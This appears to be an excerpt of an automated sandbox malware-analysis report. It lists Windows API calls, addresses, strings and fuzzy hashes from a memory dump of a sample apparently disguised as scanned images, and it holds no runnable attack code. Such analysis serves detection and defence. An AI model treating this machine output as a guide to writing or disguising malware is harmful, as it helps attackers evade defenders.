                                                                                • GetLastError.KERNEL32(00000000), ref: 004DA273
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DA2C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                • String ID: SeDebugPrivilege
                                                                                • API String ID: 2533919879-2896544425
                                                                                • Opcode ID: 36cebcc0594704a954c874bdbefde51771eb26cbccc09a52553bdc3dcf25e86b
                                                                                • Instruction ID: f49da5db954e35e5ba721ac0747ba2f26e71a9f493a781365653d33ab67d0e40
                                                                                • Opcode Fuzzy Hash: 36cebcc0594704a954c874bdbefde51771eb26cbccc09a52553bdc3dcf25e86b
                                                                                • Instruction Fuzzy Hash: 976160312042419FD710DF15C4E4F1ABBE1AF44318F58849EE8664B7A3C77AED49CB9A
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004E3925
                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004E393A
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004E3954
                                                                                • _wcslen.LIBCMT ref: 004E3999
                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 004E39C6
                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004E39F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window_wcslen
                                                                                • String ID: SysListView32
                                                                                • API String ID: 2147712094-78025650
                                                                                • Opcode ID: 9cb7d56d789a9d507d30770d54360a41f2a338ddd2dba5922e6020f966fc01e2
                                                                                • Instruction ID: 4a982b30bb865aa23a34132c5dcf5d9205a7eb23bebfa405c74c6af391bfc2bc
                                                                                • Opcode Fuzzy Hash: 9cb7d56d789a9d507d30770d54360a41f2a338ddd2dba5922e6020f966fc01e2
                                                                                • Instruction Fuzzy Hash: A741C971900258ABDF219F65CC49BEB7BA9FF08355F10012BF948E7281D7759D81CB98
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004BBCFD
                                                                                • IsMenu.USER32(00000000), ref: 004BBD1D
                                                                                • CreatePopupMenu.USER32 ref: 004BBD53
                                                                                • GetMenuItemCount.USER32(01298428), ref: 004BBDA4
                                                                                • InsertMenuItemW.USER32(01298428,?,00000001,00000030), ref: 004BBDCC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                • String ID: 0$2
                                                                                • API String ID: 93392585-3793063076
                                                                                • Opcode ID: 3ed8b7768e1334a242008696dc527ba87db1c975135a23d52178168e8e2f7478
                                                                                • Instruction ID: 50a1efdd1c48a263da4d8b86e484f7f478c61345fbac3468ac434a80a47f0d90
                                                                                • Opcode Fuzzy Hash: 3ed8b7768e1334a242008696dc527ba87db1c975135a23d52178168e8e2f7478
                                                                                • Instruction Fuzzy Hash: AB51BD70A00205ABDF11CFA9C8C4BEEBBF9EF45314F14462AE4419B291D7BC9941CBB9
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00472D4B
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00472D53
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00472DE1
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00472E0C
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00472E61
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: &HG$csm
                                                                                • API String ID: 1170836740-1363431019
                                                                                • Opcode ID: 4263725fb93a81830641d3f7cceeb7a3f7652b4d5693dffaf8f7a084f637a269
                                                                                • Instruction ID: 4a876ba0beeaefa3cb02043600414a95e27817b127548271d5f4179538d5c9cf
                                                                                • Opcode Fuzzy Hash: 4263725fb93a81830641d3f7cceeb7a3f7652b4d5693dffaf8f7a084f637a269
                                                                                • Instruction Fuzzy Hash: AF41A334E00209ABCF20DF69C945ADEBBB5BF44318F14C15BE81C6B352D779AA05CB95
                                                                                APIs
                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 004BC913
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 2457776203-404129466
                                                                                • Opcode ID: b240baa155999a1ff0320fa2809e6b33db6a42c06fb58c357756048e203f7d2e
                                                                                • Instruction ID: 0c0ef8a93f1178d01e060f3c7e7ae30aae5006d69cfe0291ff3f3fb75cfa3b64
                                                                                • Opcode Fuzzy Hash: b240baa155999a1ff0320fa2809e6b33db6a42c06fb58c357756048e203f7d2e
                                                                                • Instruction Fuzzy Hash: 30112772789307BAB700AB149CC2CEB279CDF55329B20402FF504E62C2E7A86E4152BD
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$LocalTime
                                                                                • String ID:
                                                                                • API String ID: 952045576-0
                                                                                APIs
                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004A682C,00000004,00000000,00000000), ref: 0046F953
                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,004A682C,00000004,00000000,00000000), ref: 004AF3D1
                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004A682C,00000004,00000000,00000000), ref: 004AF454
                                                                                Similarity
                                                                                • API ID: ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1268545403-0
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 004E2D1B
                                                                                • GetDC.USER32(00000000), ref: 004E2D23
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004E2D2E
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004E2D3A
                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 004E2D76
                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004E2D87
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004E5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 004E2DC2
                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004E2DE1
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _memcmp
                                                                                • String ID:
                                                                                • API String ID: 2931989736-0
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                • API String ID: 0-572801152
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,?), ref: 004915CE
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00491651
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004916E4
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004916FB
                                                                                  • Part of subcall function 00483820: RtlAllocateHeap.NTDLL(00000000,?,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6,?,00451129), ref: 00483852
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00491777
                                                                                • __freea.LIBCMT ref: 004917A2
                                                                                • __freea.LIBCMT ref: 004917AE
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                • String ID:
                                                                                • API String ID: 2829977744-0
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                • API String ID: 2610073882-625585964
                                                                                APIs
                                                                                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 004C125C
                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 004C1284
                                                                                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 004C12A8
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004C12D8
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004C135F
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004C13C4
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004C1430
                                                                                Similarity
                                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                • String ID:
                                                                                • API String ID: 2550207440-0
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 004D396B
                                                                                • CharUpperBuffW.USER32(?,?), ref: 004D3A7A
                                                                                • _wcslen.LIBCMT ref: 004D3A8A
                                                                                • VariantClear.OLEAUT32(?), ref: 004D3C1F
                                                                                  • Part of subcall function 004C0CDF: VariantInit.OLEAUT32(00000000), ref: 004C0D1F
                                                                                  • Part of subcall function 004C0CDF: VariantCopy.OLEAUT32(?,?), ref: 004C0D28
                                                                                  • Part of subcall function 004C0CDF: VariantClear.OLEAUT32(?), ref: 004C0D34
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4137639002-1221869570
                                                                                APIs
                                                                                  • Part of subcall function 004B000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?,?,004B035E), ref: 004B002B
                                                                                  • Part of subcall function 004B000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?), ref: 004B0046
                                                                                  • Part of subcall function 004B000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?), ref: 004B0054
                                                                                  • Part of subcall function 004B000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?), ref: 004B0064
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 004D4C51
                                                                                • _wcslen.LIBCMT ref: 004D4D59
                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 004D4DCF
                                                                                • CoTaskMemFree.OLE32(?), ref: 004D4DDA
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 614568839-2785691316
                                                                                • Opcode ID: a5f2055d99b77dcf2e7d2a98c66f4f6fcc241041ce203878216db2853b0bd12a
                                                                                • Instruction ID: 7a6676aa555c13771866f63afb482abbf87d61b4efb5c13cbdef68a77ec705c5
                                                                                • Opcode Fuzzy Hash: a5f2055d99b77dcf2e7d2a98c66f4f6fcc241041ce203878216db2853b0bd12a
                                                                                • Instruction Fuzzy Hash: 31912871D0021DEFDF10DFA5C890AEEB7B9BF48304F10856AE915AB241DB389A49CF64
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 004E2183
                                                                                • GetMenuItemCount.USER32(00000000), ref: 004E21B5
                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004E21DD
                                                                                • _wcslen.LIBCMT ref: 004E2213
                                                                                • GetMenuItemID.USER32(?,?), ref: 004E224D
                                                                                • GetSubMenu.USER32(?,?), ref: 004E225B
                                                                                  • Part of subcall function 004B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004B3A57
                                                                                  • Part of subcall function 004B3A3D: GetCurrentThreadId.KERNEL32 ref: 004B3A5E
                                                                                  • Part of subcall function 004B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004B25B3), ref: 004B3A65
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004E22E3
                                                                                  • Part of subcall function 004BE97B: Sleep.KERNEL32 ref: 004BE9F3
                                                                                Similarity
                                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                • String ID:
                                                                                • API String ID: 4196846111-0
                                                                                • Opcode ID: 6c77ece2acb4a4c35b2810f2283b30f4746955d9627753ef2e035cb4d68754f1
                                                                                • Instruction ID: 5f56a10763c89c73615593b72e29c1e6c0d7fb4c32c768bb69c59daf609ce4a5
                                                                                • Opcode Fuzzy Hash: 6c77ece2acb4a4c35b2810f2283b30f4746955d9627753ef2e035cb4d68754f1
                                                                                • Instruction Fuzzy Hash: 0F71B375A00245AFCB00DF66C981AAEB7F5FF48315F1084AAE916EB341D778EE018B95
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 004BAEF9
                                                                                • GetKeyboardState.USER32(?), ref: 004BAF0E
                                                                                • SetKeyboardState.USER32(?), ref: 004BAF6F
                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004BAF9D
                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004BAFBC
                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 004BAFFD
                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004BB020
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: bc80342565f82d0d7363db802c26b6684631747d29752d07e17c08576d89f1e2
                                                                                • Instruction ID: c43da3716c5f47a333bc96891f7851ac5e66d7f226ca5818ad0aeeb8972087b9
                                                                                • Opcode Fuzzy Hash: bc80342565f82d0d7363db802c26b6684631747d29752d07e17c08576d89f1e2
                                                                                • Instruction Fuzzy Hash: 8851C1A06047D53DFB3692348845BFB7EA99B06304F08888AE1D9555C2C3DDEC98D7B9
                                                                                APIs
                                                                                • GetParent.USER32(00000000), ref: 004BAD19
                                                                                • GetKeyboardState.USER32(?), ref: 004BAD2E
                                                                                • SetKeyboardState.USER32(?), ref: 004BAD8F
                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004BADBB
                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004BADD8
                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004BAE17
                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004BAE38
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: c061fa7c2fb9f4b597f8cdee4fa042353e75bd2618d516a8fda4d15060b87b58
                                                                                • Instruction ID: 9ec0cc14d4ad381965dff80d80ed242b880a5c4778d412b3b08adf7ff8a898ee
                                                                                • Opcode Fuzzy Hash: c061fa7c2fb9f4b597f8cdee4fa042353e75bd2618d516a8fda4d15060b87b58
                                                                                • Instruction Fuzzy Hash: 9451F4A15447D13DFB3783348C95BFB7EA95B46300F08858AE1D5469C2C398ECA8D77A
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(00493CD6,?,?,?,?,?,?,?,?,00485BA3,?,?,00493CD6,?,?), ref: 00485470
                                                                                • __fassign.LIBCMT ref: 004854EB
                                                                                • __fassign.LIBCMT ref: 00485506
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00493CD6,00000005,00000000,00000000), ref: 0048552C
                                                                                • WriteFile.KERNEL32(?,00493CD6,00000000,00485BA3,00000000,?,?,?,?,?,?,?,?,?,00485BA3,?), ref: 0048554B
                                                                                • WriteFile.KERNEL32(?,?,00000001,00485BA3,00000000,?,?,?,?,?,?,?,?,?,00485BA3,?), ref: 00485584
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: b0b7466c5ba3c17daa1ebe08d321de8b947177fb78a7f45f1604b083954182c1
                                                                                • Instruction ID: 33f85f7e4cf9f11f12c8d7c64fa8d5cc9dd0831a540ceb98ecaf436a9a99b58c
                                                                                • Opcode Fuzzy Hash: b0b7466c5ba3c17daa1ebe08d321de8b947177fb78a7f45f1604b083954182c1
                                                                                • Instruction Fuzzy Hash: 1051E5B0A00648AFDB10DFA8D885AEEBBF9EF09300F14455BF955E7292D734DA41CB64
                                                                                APIs
                                                                                  • Part of subcall function 004D304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 004D307A
                                                                                  • Part of subcall function 004D304E: _wcslen.LIBCMT ref: 004D309B
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004D1112
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1121
                                                                                • WSAGetLastError.WSOCK32 ref: 004D11C9
                                                                                • closesocket.WSOCK32(00000000), ref: 004D11F9
                                                                                Similarity
                                                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 2675159561-0
                                                                                • Opcode ID: e04dc94c97414a1d559cace77acecebecd2f3a12abc08d0a5f602bf1f3fbc85b
                                                                                • Instruction ID: a4e43debbf2f36acd4bdc10f8b82a5a2dfb8309465b1ee57eaa445b2ddf2be29
                                                                                • Opcode Fuzzy Hash: e04dc94c97414a1d559cace77acecebecd2f3a12abc08d0a5f602bf1f3fbc85b
                                                                                • Instruction Fuzzy Hash: F241F531200204AFDB109F54C894BAEB7A9FF45319F14806BFD159B392C778AD45CBA9
                                                                                APIs
                                                                                  • Part of subcall function 004BDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004BCF22,?), ref: 004BDDFD
                                                                                  • Part of subcall function 004BDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004BCF22,?), ref: 004BDE16
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 004BCF45
                                                                                • MoveFileW.KERNEL32(?,?), ref: 004BCF7F
                                                                                • _wcslen.LIBCMT ref: 004BD005
                                                                                • _wcslen.LIBCMT ref: 004BD01B
                                                                                • SHFileOperationW.SHELL32(?), ref: 004BD061
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                • String ID: \*.*
                                                                                • API String ID: 3164238972-1173974218
                                                                                • Opcode ID: 538441cc5cc71797d2000710195022cdd63beaa1c6baf8aaa344f06aca10b24b
                                                                                • Instruction ID: 20ee31348a2bf6af39fc85477d40aa910ec0cf1a16116339a08b71eede12356a
                                                                                • Opcode Fuzzy Hash: 538441cc5cc71797d2000710195022cdd63beaa1c6baf8aaa344f06aca10b24b
                                                                                • Instruction Fuzzy Hash: 61416971D052189FDF12EFA5C9C1AEE77B9AF44344F1004EBE509EB142EB38A645CB64
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004E2E1C
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004E2E4F
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004E2E84
                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004E2EB6
                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004E2EE0
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004E2EF1
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004E2F0B
                                                                                Similarity
                                                                                • API ID: LongWindow$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 2178440468-0
                                                                                • Opcode ID: 23a5e3c81fd46b578abe96728ab51bb60fdd582fedeed748c2e468be305400a1
                                                                                • Instruction ID: eaa44669fe0efbdf322327006fbb610683b6e346d7b1d02968c9fc016cf907b9
                                                                                • Opcode Fuzzy Hash: 23a5e3c81fd46b578abe96728ab51bb60fdd582fedeed748c2e468be305400a1
                                                                                • Instruction Fuzzy Hash: 193116306042A0AFDB208F1DDDC4F6637E8EB6A711F1401A6F9009F2B2CBB5AC459B49
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B7769
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B778F
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004B7792
                                                                                • SysAllocString.OLEAUT32(?), ref: 004B77B0
                                                                                • SysFreeString.OLEAUT32(?), ref: 004B77B9
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 004B77DE
                                                                                • SysAllocString.OLEAUT32(?), ref: 004B77EC
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: 2b75ef579b6db35312ab61718e6cc3d76b0af270fa331981b3f58cd1090c2cce
                                                                                • Instruction ID: f021eeb9f77dc4d724afe1b3c37dbe55673707a361766928a8bec79f700fa234
                                                                                • Opcode Fuzzy Hash: 2b75ef579b6db35312ab61718e6cc3d76b0af270fa331981b3f58cd1090c2cce
                                                                                • Instruction Fuzzy Hash: 7321A176604219AFDB10DFA8DCC8CFB77ACEB493647108426B914DB291DA74EC428B78
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B7842
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B7868
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004B786B
                                                                                • SysAllocString.OLEAUT32 ref: 004B788C
                                                                                • SysFreeString.OLEAUT32 ref: 004B7895
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 004B78AF
                                                                                • SysAllocString.OLEAUT32(?), ref: 004B78BD
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: c7e10541bba484f0f879259ffaae0c8168e22a255191fa5cd55583d97dd65484
• Instruction ID: 80431b556f27a236d416cc180e7227ff6fc7a5c5b8d7fefb0270ad0c987b10c2
• Opcode Fuzzy Hash: c7e10541bba484f0f879259ffaae0c8168e22a255191fa5cd55583d97dd65484
• Instruction Fuzzy Hash: B2217131608204AFDB10AFB8DCC8DAB77ECEB497607108526F915CB2A1D678DC46CB78
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 004C04F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004C052E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: ff5f99eb11bcd05ac59bec11da0ca88d3ea59e844c7f8b82a1a627d89f0a9b27
• Instruction ID: 1cc8f70685700119d761c514f78b764dcafcd35daa5337d6d916b375bdb754a0
• Opcode Fuzzy Hash: ff5f99eb11bcd05ac59bec11da0ca88d3ea59e844c7f8b82a1a627d89f0a9b27
• Instruction Fuzzy Hash: F0212C79500305EBDF609F69D884F9A7BA4AF44724F204A2EE9A1D62E0D7749942CF28
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 004C05C6
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004C0601
